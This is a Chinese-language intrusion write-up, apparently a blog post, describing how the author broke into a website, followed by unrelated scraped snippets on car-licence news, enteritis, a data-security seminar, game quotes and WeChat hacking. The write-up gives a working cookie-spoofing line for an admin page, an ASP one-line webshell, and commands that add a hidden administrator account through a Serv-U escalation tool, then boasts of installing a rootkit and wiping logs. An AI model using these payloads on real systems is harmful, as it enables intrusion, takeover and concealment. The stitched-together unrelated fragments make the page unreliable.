DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的) 后台没什么功能,想放弃,可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办,从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码,再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行, 后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到 SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行: http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
近日据最新消息报道非法过户机动车指标将纳入黑名单,该报道一出来就引起了很大的争议,据了解在北京经常会有人因为想要过户京牌指标,不惜以“假结婚”为手段,那么你们知道非法过户他人车辆是否犯罪,那么接下来大...
心情随笔 肠炎的症状(肠炎的症状有哪些?)大家都了解,日常饮食会马上伤害肠菌。在现实生活中,很多人全是有肠胃病的经历,其对身体造成 的伤害是十分大的。对于患有这类症状的人来讲,无法马上接受治疗,前期...
2021年1月15日,CCF数据安全治理研讨会北京安华金和高新科技有限责任公司总公司完满举办!本次大会由中国计算机学会(CCF)举办,CCF抗极端自然环境电子计算机专委会(下称:专委会)筹办,安华...
不知道你们是否记得,那些英雄那些英雄的语音,照旧那些经典的技术经典语录!反贼们再不跳反就没 时机了,主公不给力啊!人不犯我我不监犯,人若犯我我必监犯!一世英名见鬼去吧!精忠报国!掌中 武霸萧神绝!...
第一关:一身是胆第二关:昆明第三关:有机可乘第四关:一触即发第五关:武松第六关:大刀阔斧第七关:火烧第八关:开门见山第九关:来日。 toyotachromegooglecoronachaneladid...
本文目录一览: 1、黑客可以把微信所有信息同步在另一端嘛 2、微信被黑客盗了换成了其他的手机号码,验证码也收不到怎么回事? 3、黑客通过黑进我的短信然后通过短信验证登录我的微信我的钱会被转走吗...